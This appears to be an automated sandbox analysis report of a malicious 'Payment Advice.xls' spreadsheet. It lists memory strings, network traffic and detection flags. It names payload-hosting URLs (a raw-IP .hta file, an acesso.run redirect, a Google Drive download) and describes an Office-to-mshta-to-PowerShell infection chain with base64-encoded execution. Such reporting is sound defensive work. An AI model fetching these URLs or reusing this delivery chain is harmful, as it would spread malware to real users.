              Source: mshta.exe, 0000000F.00000003.465919447.00000000003D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465919447.000000000039F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472711657.000000000039F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467846685.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467578638.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta
              Source: mshta.exe, 0000000F.00000003.466349057.000000000039F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465919447.000000000039F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472711657.000000000039F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta%
              Source: mshta.exe, 0000000F.00000002.472967110.00000000032CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467578638.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta...
              Source: mshta.exe, 00000004.00000002.427589487.00000000004BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta:
              Source: mshta.exe, 0000000F.00000003.466349057.000000000039F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465919447.000000000039F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472711657.000000000039F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htaC
              Source: mshta.exe, 00000004.00000002.427589487.00000000004BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htaFi
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htaN
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htae
              Source: mshta.exe, 0000000F.00000003.466349057.000000000039F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465919447.000000000039F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472711657.000000000039F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htae6
              Source: mshta.exe, 0000000F.00000003.466349057.000000000039F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465919447.000000000039F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472711657.000000000039F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htaepC:
              Source: mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htafC:
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htah
              Source: mshta.exe, 00000004.00000003.424720097.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467531580.0000000002CB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.htahttp://198.
              Source: mshta.exe, 0000000F.00000002.472711657.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465919447.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466349057.00000000003F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.155/AF59
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472967110.00000000032CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467578638.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: powershell.exe, 00000005.00000002.445010616.00000000034CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
              Source: powershell.exe, 00000005.00000002.449590100.0000000012141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472967110.00000000032CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467578638.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472967110.00000000032CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467578638.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: powershell.exe, 00000005.00000002.445010616.0000000002111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.532800239.0000000002571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.483591075.0000000002051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539917275.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.427996527.0000000003AC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472967110.00000000032CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467578638.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/
              Source: mshta.exe, 0000000F.00000002.472711657.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465919447.00000000003F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466349057.00000000003F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acesso.run/J
              Source: mshta.exe, 0000000F.00000002.472711657.000000000038D000.00000004.00000020.00020000.00000000.sdmp, Payment Advice.xls, A5330000.0.drString found in binary or memory: https://acesso.run/j2AmN9?&cameo=misty&chador=orange&alto=dark&cloak=domineering&efficacy=deeply&pri
              Source: powershell.exe, 00000005.00000002.449590100.0000000012141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000005.00000002.449590100.0000000012141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000005.00000002.449590100.0000000012141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000E.00000002.532800239.0000000002772000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539917275.00000000028A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
              Source: powershell.exe, 0000001B.00000002.536462768.0000000001CC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=dow
              Source: powershell.exe, 0000001B.00000002.539917275.00000000028A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
              Source: powershell.exe, 0000000E.00000002.532800239.0000000002946000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539917275.0000000002A76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: powershell.exe, 0000000E.00000002.532800239.0000000002946000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.539917275.0000000002A76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
              Source: powershell.exe, 00000005.00000002.449590100.0000000012141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: mshta.exe, 00000004.00000002.428001171.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424366709.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423576211.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423857505.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.424196903.0000000003AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.466200221.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472967110.00000000032CD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.465346221.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472988386.0000000003306000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.467578638.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
              Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
              Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
              Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
              Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49163 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49165 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49171 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49172 version: TLS 1.2
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
              Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: Process Memory Space: powershell.exe PID: 2692, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3860, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Excel sheet contains many unusual embedded objects
              Source: Payment Advice.xlsOLE: Microsoft Excel 2007+
              Source: Payment Advice.xlsOLE: Microsoft Excel 2007+
              Source: Payment Advice.xlsOLE: Microsoft Excel 2007+
              Source: A5330000.0.drOLE: Microsoft Excel 2007+
              Source: A5330000.0.drOLE: Microsoft Excel 2007+
              Source: A5330000.0.drOLE: Microsoft Excel 2007+
              Microsoft Office drops suspicious files
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme[1].htaJump to behavior
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
              Wscript starts Powershell (via cmd or directly)
